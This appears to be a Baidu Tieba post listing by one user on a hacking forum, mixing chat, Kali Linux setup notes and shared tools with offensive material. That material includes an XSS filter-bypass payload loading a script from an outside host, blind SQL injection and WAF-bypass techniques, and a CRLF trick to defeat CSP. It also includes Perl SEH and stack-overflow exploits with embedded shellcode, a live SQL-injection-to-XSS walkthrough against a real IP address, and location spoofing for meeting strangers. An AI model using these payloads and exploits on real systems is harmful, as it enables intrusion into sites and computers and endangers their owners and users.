mramydnei
mramydnei
bla
关注数: 9
粉丝数: 236
发帖数: 3,201
关注贴吧数: 15
test2 字符限制:100 黑名单: document (单个字幕转成unicode) char (没用String.fromCharCode 字数不够) script(拆分,再用+号拼接) onclick(过滤) onmouse(过滤) onload(问题内容过滤,标题不过滤) onerror(问题内容过滤,标题不过滤) 白名单: a标签 img标签 最终payload: <img src=x onerror="\u0064ocument.write('<sc'+'ript src=//zsy.ca/33></sc'+'ript>')">
玩贴吧,得Q币,QQ浏览器感恩大抽奖! 给力的活动!
BUG°É 图片来自:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F%E8%BF%99%E9%87%8C%C5%BE%E6%9F%90%E8%B5%A1%E9%98%8B%EE%80%94%E5%A5%88%E6%91%B9%E6%9E%97%C5%BE%C5%BD%E5%88%B6&urlrefer=84784dff79b77e50d536997fe02ceffaasd
来一发 10天没碰电脑了 感觉好舒服
new deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhttp.kali.org%2Fkali&urlrefer=1e72c7d298c7810be0b8563f1069c2a9 kali main non-free contrib deb-src http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhttp.kali.org%2Fkali&urlrefer=1e72c7d298c7810be0b8563f1069c2a9 kali main non-free contrib deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fsecurity.kali.org%2Fkali-security&urlrefer=4001a080d748236fad38a99aba247d97 kali/updates main contrib non-free
/var/log/auth.log查看问题 谁帮忙把这个改成 显示ip 用户名 和登陆失败次数的 grep "Failed password " /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more 现在是: root@server-m1r4:/var/log# grep "Failed password " /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more 350 213.211.148.159 4 103.245.196.140 3 oracle 2 msr 1 zt 1 user0 1 ss2701 1 sir 1 roo 1 network 1 nagios 1 guest 1 eggbreaker2 1 CUCU 1 avouni 1 133.52.52.112 谢了!
电子图书分享 下载地址:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D452993%26uk%3D4094653993&urlrefer=5677213f777576c56073c599dbc6ec2f
0rz 这个吧也有。。
还差两点经验就升级了 我能水一下么 虽然我一直都在水
macbook安装kali linux(Debian) macbook安装kali linux(Debian) 当你尝试在macbook上single boot一个debian或kali linux时(如果是ubuntu或BT的话,你会发现过程会异常的顺利),你会发现默认安装的GRUB或LILO都无法引导你的操作系统。这个问题也让我困惑了很长时间(因为默认安装的grub是0.9 这个版本不是efi bootable的)。经过长时间的努力,终于解决了这个问题。在这里和大家分享下这个过程。首先插入kali或debian的CD正常安装一次,安装完成后重启。然后按住option键,通过光盘进入到livecd当中。启动terminal: chroot / aptitude install grub2 gptsync #this will remove grub-pc gptsync sda #这里的sda是你系统所在的磁盘 grub-install /dev/sda2/ #sda2 是你的系统分区 update-grub shutdown -r now 完成以上步骤之后,你的系统已经可以正常的通过grub2来引导了。但是还有一个问题。在正常启动时系统会有一个30s的delay(如果你是按住option来启动并选择linux来启动的话可以缩短到3s,但是每次都要按很麻烦),这是因为你没有设置默认的启动分区 插入mac os x的安装光盘 重新启动,按住option 通过光盘启动 进入安装界面 从菜单选择terminal: bless --device /dev/disk0 --setBoot --legacy --verbose #这里的disk0是安装grub的分区,可以通过diskutil list来进行查看 reboot 现在你的kali(debian)已经可以完美的single boot了。 后续部分我都是参考的rootoorotor仁兄的吧博文: 修复sources.list(如果安装过程中没有连接到internet的话): root@kali:~# nano /etc/apt/sources.list #utsc sources deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fmirrors.ustc.edu.cn%2Fkali&urlrefer=133fe1f4142b7ad7c1c4d75132e80f32 kali main non-free contrib deb-src http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fmirrors.ustc.edu.cn%2Fkali&urlrefer=133fe1f4142b7ad7c1c4d75132e80f32 kali main non-free contrib deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fmirrors.ustc.edu.cn%2Fkali-security&urlrefer=cb8f8a49a11ec2206a13d15da25fb7ab kali/updates main contrib non-free #kali defualt sources deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhttp.kali.org%2Fkali&urlrefer=1e72c7d298c7810be0b8563f1069c2a9 kali main non-free contrib deb-src http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhttp.kali.org%2Fkali&urlrefer=1e72c7d298c7810be0b8563f1069c2a9 kali main non-free contrib deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fsecurity.kali.org%2Fkali-security&urlrefer=4001a080d748236fad38a99aba247d97 kali/updates main contrib non-free 加入之后就可以对系统进行更新了,终端中输入: root@kali:~# apt-get update && apt-get dist-upgrade 安装中文+日文输入法: root@kali:~#apt-get install ibus ibus-pinyin ibus-anthy 安装完成之后,打开终端输入: im-config 确认手工配置,选择你喜欢的输入法. 然后重启系统~ 如果你使用的是ibus: 右键点击右上角的输入法图标 —— 首选项 —— 输入法+中文 —— 高级——勾上所有程序共享使用同一个输入法 浏览器安装flash插件 apt-get install flashplugin-nonfree 安装wineQQ 2012 dpkg --add-architecture i386 刷新软件源: apt-get update 2.安装32位库与其库文件: apt-get install ia32-libs libnotify-bin ia32-libs-gtk 3.编译安装新版的 alsa-lib库,保证wineQQ2012在使用时不出现假死和无声等情况: wget http://tieba.baidu.com/mo/q/checkurl?url=ftp%3A%2F%2Fftp.alsa-project.org%2Fpub%2Flib%2Falsa-lib-1.0.26.tar.bz2&urlrefer=6ea63712762f0076d81dc37327356863 bzip2 -d alsa-lib-1.0.26.tar.bz2 tar -vxf alsa-lib-1.0.26.tar cd alsa-lib-1.0.26/ ./configure make && make install make clean 4.下载并安装wine QQ2012: wget http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.longene.org%2Fdownload%2FWineQQ2012-20121221-Longene.deb&urlrefer=398cb2dae4613011a8a74cccadc1bcd7 dpkg -i WineQQ2012-20121221-Longene.deb 安装NV显卡驱动: 1.首先确定自己的显卡型号, lspci |grep -i VGA 2.明确显卡驱动之后到nvidia官网搜索并下载驱动,如图: 下载完成之后得到一个名为 NVIDIA-Linux-x86_64-310.40.run 的文件,我把这个文件放到了root目录,并重命名为N.run(方便输入和补全) 打开终端: mv NVIDIA-Linux-x86_64-310.40.run /root/N.run 添加可执行权限(貌似不用这步也可以,不过我是加上了) chmod 777 N.run 3.在开始安装之前,请分别安装下面的软件包确保安装环境: apt-get install dkms build-essential 3.在/etc/modprobe.d/目录下新建一个名为nouveau-kms.conf的文件在里面写入一行options nouveau modeset=0 命令如下: echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf 然后执行: update-initramfs -u 重启系统,进入桌面后按 Ctrl+Alt+F2 组合键,输入用户名和密码进入 tty1(进入root用户) 开始配置: 关闭图形界面: /etc/init.d/gdm3 stop 执行安装驱动的文件: sh N.run 安装故过程中选择安装DKMS可能会安装失败 在爱这里我选择的是NO
老发翻译的也不太好,发一个自己写的 突破防注入的技巧(WAF) 空闲之余在国内外找了一些 bypass 防注入的代码,最后整理成了这个小文章。就像大牛们说的一样木有银弹,所以没有哪个方法是万能的,具体问题还得具体分析。希望大牛们表吐槽.大概的目录结构是这样: 第一章 通过编码突破防注入 1.1URL编码 1.2使用mysql内置函数 1.3使用base64变形注入 第二章 替换函数和关键字 2.1判断注入点的各种姿势 2.2替换空格的一些tips 2.3单引号的巧妙替换 2.4具有相似功能的mysql函数 2.5没有union 2.6没有limit 2.7没有where 2.8没有group 2.9没有having 2.10没有select 2.11没有and 2.12没有or 2.13突破preg_replace 第三章 多参数查询 3.1多参数的处理规则 3.2示例代码 第四章 打碎关键字 4.1使用%打碎关键字 4.2通过注释符打碎关键字 4.3使用%0b打碎关键字 4.4使用%6f打碎关键字 第五章 更改method方式 5.1cookie注入 5.2更改method为post 第六章 利用web服务器的特性 6.1web服务器和WAF对一些字符的处理 6.2示例代码 6.3突破安全狗 第七章 缓冲区溢出 7.1突破C编写的WAF 第八章 组合攻击 8.1request对象的包解析漏洞 8.2GPC组合攻击 第九章 大小写转换 9.1关键字的大小写转换 第十章 对参数值进行污染处理 10.1示例代码 第十一章 其它技巧 百度网盘下载连接:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D417485%26uk%3D4094653993&urlrefer=e54f503b2e52c563e450e70f327978e0
[翻译]关于通过对8bit的ascii做右位移提高mysql盲注效率 通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位 下面将以查询mysql数据库当中user()的第一位为例: ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1) 首先执行如下sql语句: mysql> select (ascii((substr(user(),1,1))) >> 7)=0; 我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的 第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1 如果运算结果为1,说明第一位为0,不为1 +————————————–+| (ascii((substr(user(),1,1))) >> 7)=0 |+————————————–+| 1 |+————————————–+ 1 row in set (0.00 sec) 这样我们就确定这个8bit的ascii的第一位为0 第二次我们来做6次右偏移来确定前两位 前两位可能是01或00,即依然可以与0做比较, mysql> select (ascii((substr(user(),1,1))) >> 6)=0; +————————————–+| (ascii((substr(user(),1,1))) >> 6)=0 |+————————————–+| 0 |+————————————–+ 1 row in set (0.00 sec) 结果为0,即第二位为1 开始猜测前三位为010或011 让我们看看010和011的ascii码是多少 分别查询select b’011′ select b’010′ 获得结果 010 = 2 011 = 3 执行如下sql: mysql> select (ascii((substr(user(),1,1))) >> 5)=2; +————————————–+| (ascii((substr(user(),1,1))) >> 5)=2 |+————————————–+| 0 |+————————————–+ 即前三位不为010,而是011 直到获得最后一位 最终结果为:01110010 转换一下: select b’01110010′ 查询结果 +————-+| b’01110010′ |+————-+| r |+————-+ 1 row in set (0.00 sec) 这样我们就获得了user()的第一位.其它位依此类推
听说升到3级有大权限发一个以前自己翻译的东西 CRLF和CSP 首先要简单的介绍一下一个东西,叫CSP(Content SEcurity Policy)现在XSS那么火,相信基友们也都听说过。简单的来说CSP主要是以防止注入型的攻击而开发的,比如说:XSS虽然江湖传闻CSP是XSS的终结者,但广大基友们的姿势还是很多的。CRLF就是其中的一种姿势了。作为一种具有可更改HTTP Response header的攻击方式,在这里就可以带给我们绕过CSP的一种可能性。 在这里穿插一点小内容:CRLF和CSP比如说我们用CRLF的方式插入了一个Content-Security-Policy。这时就存在了两个相同的Content-Security-Policy。而对于这个相同的内容的处理,每个浏览器都是不一样的。有些浏览器会选择位置靠前的,而部分浏览器也会选择位置靠后的。让我们来做一个有趣的实验: 一个简单的CSP规则大概可以使这个样子:Content-Security-Policy: default-src 'self' 现在假设存在两个页面: ------------------------------------ 页面1: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhost%3A3000%2Fcsp&urlrefer=7bd6e0ed01d76660471f3274a9c4a16e内容为:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhost%3A3333%2Fxss.js&urlrefer=083199e5ad95d4f2a1b10b3a4ad57561 ------------------------------------ 页面二: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhost%3A3333%2Fxss.js&urlrefer=083199e5ad95d4f2a1b10b3a4ad57561内容为:alert('XSS’) ------------------------------------ 我们先把情况分为两大类:第一种情况:http response header会比CSP header快一些在这里我们在根据浏览器的取舍原则,把情况分成两类: (1)出现重复的header内容以靠前的为准。在这个情况下我们可以直接这样的GET请求: GET http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.2cto.com&urlrefer=ae94fc109f7cfbf59e5ae27c01d13679 :3000/csp?Content-Security-Policy: allow *而这时的HTTP response可能会是这样: ------------------------------------------- HTTP/1.1 200 OKconnection:closeX-Content-Security-Policy: allow *X-Runtime:3X-Content-Security-Policy: default-src 'self'Content-Type:text/htmlContent-Length:81 -------------------------------------------- pwned!成功地绕过CSP! (2)出现重复的header内容以靠后的为准。我们只需要把下面的X-Content-Security-Policy一直往回推推到页面当中就可以了:我们的请求可以这样的:GET http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhsot%3A3000%2Fcsp%3Flang%3Djp&urlrefer=b8f796f968241aa2915defae9867ace7 <html>通过下面的内容你可以看出我们可怜的CSP已经被挤到了html页面当中: --------------------------------------------------------------- HTTP/1.1 200 OKconnection:closeDate:15.01.2013lang:jap <html>Etag:"a25cda3f45v54v45h45g45v34v34v34v334v34v3"X-content-Security_plicy:default-src 'self'Content-Type:text/htmlContent-Length:81 ---------------------------------------------------------------- pwned!成功绕过! 第二种情况:http response header会比CSP header慢一些 (1)出现重复的header内容以靠前的为准。 (2)出现重复的header内容以靠后的为准
发个贴看看会不会被删
新人报个到 这个贴吧好像很热闹的样子
一些自己收集的电子书,分享一下吧 http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D340543%26uk%3D4094653993&urlrefer=a0dac907e742e1d8dea4ffc1577dc394
都说学黑客要先学C语言。那就统计一下吧里面不懂C语言的
这个吧现在能不能公开招基友? 问一下先
exploit编写 -误人子弟系列教程 基于SEH的堆栈溢出视频(二) 网盘地址: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D154755%26uk%3D4094653993&urlrefer=78d7c93c374bc0e93b8f6b5b66e44a73 目标程序:SORITONG v1.0 测试环境: WINXP SP3 步骤: (1)通过junkcode来crash程序。初步判定可溢出性 (2)确定se hendler和next SEH的offset (3)填入我们构造好的pop pop ret 和short jump代码 (4)加上我们的payload (5)pwned! 一个典型的基于SEH的栈溢出模型: ------------------------------------------------------- buffer nextSEH SE Handler shellcode - junkcode 跳到shellcode 跳到nextSEH payload - ------------------------------------------------------- SE Handler: pop/pop/ret (确认不受safeseh保护)next SEH: 0xeb 0x06 0x90 0x90(通过上面的pop pop ret触发下一个seh,再通过nextseh跳到shellcode) tips: 可以通过immunity debugger插件:pvefindaddr来查询不受safeseh保护的dll 命令: !pvefindaddr nosoafessh 序列命令(sequence commands): pop r32 pop r32 retn 附exp: my $file="UI.TXT"; my $junk="\x41" x 584; my $nextseh="\xeb\x06\x90\x90"; my $sehandler= pack('V',0x010b4233); my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca"; my $junk2="\x90" x 1000; open($FILE, ">$file"); print $FILE $junk.$nextseh.$sehandler.$shellcode.$junk2; close($FILE);
exploit编写 -误人子弟系列教程 堆栈溢出基础视频(一) 网盘地址:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D149498%26uk%3D4094653993&urlrefer=8053cb7185260d9a3af8f1aa9493ae29 关于jmp esp: xp通用的jmp esp 0x7ffa4512 关于filepath会被包含在stack里的问题: 我们可以在shellcode起始部分,加入一个路径。比如: "D:\\" 来覆盖stack里的path,进一步提高shellcode的稳定性。 附exp: my $file="exploit.m3u"; my $path="D:\\"; my $junk="\x41" x 26121; my $eip=pack('V',0x7ffa4512); my $junk2="\x90" x 4; my $shellcode ="\x90" x 3; my $shellcode = $shellcode."\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca"; open($FILE, ">$file"); print $FILE $path.$junk.$eip.$junk2.$shellcode; close($FILE);
不得不说这个吧排名挺考前的 感慨一下
还没睡的进来扯会儿蛋啊! RT
求助 关于编写exploit系列 第一部分 EIP偏移问题 首先,在这方面我是个超级新人。所以有些术语可能用错了或表述的不清楚希望大家多多体谅!:p: 系统环境:Windows xp SP3 目标程序: Easy RM 2 MP3 converter 3.0.0.7 我通过书上的方法,成功地用esp jmp(程序自己的dll里面找的)覆盖了EIP,并成功地让程序执行了我的shellcode(一个调用calc 144bytes的shellcode)。 从这里开始就是我的问题了。 我和我其他的两个朋友,我们都用了相同的操作系统环境 都是xp sp3 我们都没有使用系统dll里面的jmp esp(比如说kernel32.dll)。 为什么我们找到的EIP都是不一样的? 是不是用jmp esp来覆盖eip寄存器的方法不可能写出来一个通用的exploit 我的意思是起码在同样的系统版本和补丁号下。 EIP的偏移是什么导致的? 在这个程序中 我如何才能通过覆盖EIP来达到写出来比较通用的explit? 如果不可以,希望你能告诉我为什么? 希望能得到你们的答复。
求助 关于编写exploit系列 第一部分 EIP偏移问题 求助 关于编写exploit系列 第一部分 EIP偏移问题 首先,我是个超级新人。所以有些术语可能用错了或表述的不清楚希望大家多多体谅!:p: 系统环境:Windows xp SP3 目标程序: Easy RM 2 MP3 converter 3.0.0.7 我通过书上的方法,成功地用esp jmp(程序自己的dll里面找的)覆盖了EIP,并成功地让程序执行了我的shellcode(一个调用calc 144bytes的shellcode)。 从这里开始就是我的问题了。 我和我其他的两个朋友,我们都用了相同的操作系统环境 都是xp sp3 我们都没有使用系统dll里面的jmp esp(比如说kernel32.dll)。 为什么我们找到的EIP都是不一样的? 是不是用jmp esp来覆盖eip寄存器的方法不可能写出来一个通用的exploit 我的意思是起码在同样的系统版本和补丁号下。 EIP的偏移是什么导致的? 在这个程序中 我如何才能通过覆盖EIP来达到写出来比较通用的explit? 如果不可以,希望你能告诉我为什么? 希望能得到你们的答复。 虽然这个问题 也许对很多人来说很简单。但我找不到任何可以去问的地方。
这个xss filter能破么? 一楼防抽
求翻译 他日有机会定重谢! In general, the closer the specification is to the users understanding ,the harder in time and effort it becomes to apply the transformation process In general, the closer the specification is to the users understanding ,the harder in time and effort it becomes to apply the transformational process.Despite this problem ,however,the transformational approach presents a promissing new way of developing software for the following reasons
果然还是得有个管理权限 以后就驻扎这儿了,当博客用
网盘分享 http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D110722%26uk%3D4094653993&urlrefer=9c1bf83b8079b4b97623f55d374a465d
渗透辅助工具v1.0 娱乐版 http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D110466%26uk%3D4094653993&urlrefer=a2da3104ba9f81331ee0a2fd976d2663
webapp识别工具 v1.1 webbapp识别工具 v1.1 更新日期:2012/11/12 *支持31套webapps的识别,不依赖于蜘蛛或页面内的特征性文字内容 *内置漏洞库,含漏洞个数300+*新增自定义添加漏洞和特征功能 *目前只有dedecms可以查询到远程webserver上的dedecms版本,其它webapps的版本识别功能也会在今后陆续增加. *提供源码+程序,欢迎大家动手改成更适合自己的程序*程序由C#编写,运行时需要framework的支持 *程序路径:/fingureprint/WindowsApplication2/bin/debug/Webapp识别程序v1.1.exe 如果有好的建议,请与我联系:
[email protected]
下载地址:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D101520%26uk%3D4094653993&urlrefer=a5a37624917133b831c886644287d504
webapp识别工具 v1.0beta 目前支持28套主流webapp 由于很多猥琐的站主都喜欢把主要的目录给改了之类的 所以本程序以一些比较有个性和不容易被修改到的文件和目录作为特征进行webapp的匹配. 如果有扩充特征库的需求,可以在webapp.txt当中添加webapp名称,在file.txt中添加对应的特征文件或路径。特征和webapp名称以同行匹配。 (源码+程序) 程序在 fingureprint/windowsapplication2/bin/debug/windowsapplication2.exe (请自备framework) http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D99950%26uk%3D4094653993&urlrefer=6010caeda4c3a901a4eb511b5c9d58e0
好吧 我想要这个!!!!!好贵!!静态源码分析工具thunderscan Thunderscan是由defensecode研发出来的静态源码分析工具。它可以 在 流行的开源 Web应用程序 中 发现 严重安全漏洞 ,在过去 ThunderScan 产品曾多次 证明 了这一切。 --------------------------------------------------------------------------------- 主要特点: * 保护您的 Web应用程序 * 防止 数据被窃取 * 在Web应用程序 发现 危险的安全漏洞 , * 让黑客 远离 您的网站 * 防止 SQL 注入,跨 站脚本 攻击等。 * 审核 您 的 Web应用程序代码 --------------------------------------------------------------------------------- 支持的Web 应用程序开发语言 : • ASP.NET C# •VB.Net • ASP •PHP •JAVA / JSP --------------------------------------------------------------------------------- 可以检测: SQL Injection XPATH Injection File Disclosure Mail Relay Page Inclusion Dangerous Configuration Settings Code Injection Dangerous File Extensions Shell Command Execution Misc. Dangerous Functions Cross Site Scripting Arbitrary Server Connection File Manipulation Weak Encryption HTTP Response Splitting Information Leak LDAP Injection --------------------------------------------------------------------------------- 目前支持全系列的脚本语言的版本,售价: $6,000.00 附youtube视频: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Ddcml2stPYNM%26hd%3D1&urlrefer=30555c676303b57d16bf1a180527afe4 demo中跑的是Mutillidae你们懂得!!
基于sqli的xss 基于sqli的xss 首先这不是一个好的例子。因为这个注入点完全可以得到我们想要的东西。我没工具所以就 找以前搞过的下手。 关于xss和sqli我认为没有必要去比较轻重,这是我个人的看法你可以不同意。 一个简单的例子: 注入点: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D100&urlrefer=7f6789ce45dade26bc9858d7daa0176d 紧接着 http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D100&urlrefer=7f6789ce45dade26bc9858d7daa0176d order by 1 ... ... http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D100&urlrefer=7f6789ce45dade26bc9858d7daa0176d order by 10时报错,所以有9个字段。 好了,下一步: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,2,3,4,5,6,7,8,9 from admin 我们通过这种方法成功的更换了这九个字段的内容为"1,2,3,4,5,6,7,8,9"。而且它成功的显示到了当前页面当中。 -------------------------------------------------------------------------------- 其实这大概是一个这样的过程: SELECT title, content, BigClassName, SmallClassName, imagenum, firstImageName, [user], infotime, hits FROM News WHERE (ID = - 100) UNION SELECT 1 AS Expr1, 2 AS Expr2, 3 AS Expr3, 4 AS Expr4, 5 AS Expr5, 6 AS Expr6, 7 AS Expr7, 8 AS Expr8, 9 AS Expr9 FROM Admin --------------------------------------------------------------------------------- 那我们把2换成null测试一下, http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,null,3,4,5,6,7,8,9 from admin 没有问题。这个当然不会有问题 我知道这是废话但当字段数超过30,40的时候你是不是1,2,3,4,5,.....61这样一个一个输入的很爽呢(总有你手工的时候)?你可以复制一个 ,null粘贴你需要的次数下就好 这是第一个问题。 紧接着我们再替换2为"**** me!" http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,"**** me!",3,4,5,6,7,8,9 from admin 标识2的位置成功显示"**** me" 那我们再把2换成一个xss http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,"<script>alert('**** me!')</script>",3,4,5,6,7,8,9 from admin 好吧,这次它弹起来了。 一个基于sqli的xss就这样诞生了。 一个反射型的xss的价值有多大?我不知道。 一个基于sqli的xss有没有意义?我也不知道。 但我就这么做了。 谢谢阅读
c#写的ip反查域名 代码比较丢人,有个地方循环不知道该怎么写了复制粘贴了30次。。 代码就不上了 有点问题暂时不知道怎么修复,就是只查询一次可能会有查询结果不完整或查询不到的情况。 不过速度是有的。点两次根本就花不了几个时间。 暂时只显示前30条结果。 网盘: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D83075%26uk%3D4094653993&urlrefer=d0c9dd6e8710c92c249543abb946956b (请自备framework)
c#写的后台扫描工具 虽然用了多线程(timeout 300,max线程1000),但速度不是很快。 每秒能发出去10个request的样子。 网上找了几个字典。 asp,php,jsp,asp.net分开的 下载地址: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D81882%26uk%3D4094653993&urlrefer=5b588ef4813f0ee9aedc7cfb6c2dec3f (源码+程序 请自备framework2.0或3.5) 程序在debug目录里,运行*****.exe即可。 如果有好的字典,我的意思是不要那种几兆几万行的。希望可以提供给我 联系:
[email protected]
NS!我是Headshoter还记得我么? RT! 向其他还记得我的人,问个好!
洗洗 睡吧!
三月十三在吗? 有个事儿想问你
hack tool for ios凑了4款,持续收集中 过一阵子再装sqlmap和metasploit
没睡觉的伤不起啊 RT 附岛国女孩随意偷拍一张
手头上有webcruiser.deb或websecurifty1.0.2.ipa 能分享下吗? RT
今天终於把NB给修好了!OH YEAH! 确实有点开心
其实坐黑客不就是为了 通过技术渗透地球凑齐七双阿迪王向神龙许愿,带李宇春回那美克星么
红科技术在泡妞上的应用「算不上原创」 直接奔入主题。你需要一台拥有已越狱的ios系统和网络环境。(貌似andriod也有类似的插件可以实现location fake)。安装插件protect my privacy,进一步设置自己的伪造location,当然也可以fake自己的identity来防止隐私的泄漏。之后就是通过qq或微信来 查看附近的人来开始你ws的战役了。你的附近可以有任何人,因为我们虽可以更改我们的location。 以上
貌似今天是HITB吧? ios全系列jb估计是要发布了,不知道ios6会不会也一起发布掉
推荐给没看过的同学,一款日剧 my boss my hero 以上
最近觉得编程更有意思啊与其盲目入侵 没有打击大家或觉得哪个更好的意思,只是突然间觉得这样更有方向感。 我觉得这个世界上最恐怖的就是 以为自己懂 这种吧。我以前也是很爱面子的人,别人懂php我就想也懂一下。别人搞个ssh整合开发什么的,我也想了解一下到时候也能插个嘴啊什么的,显得自己什么都懂。搞到最后自己对什么都是一知半解。所以这些年一直在看编程方面的东西,来真正的提高一下自己。也许提高的空间不会很大,但很踏实。
新生在日本? rt
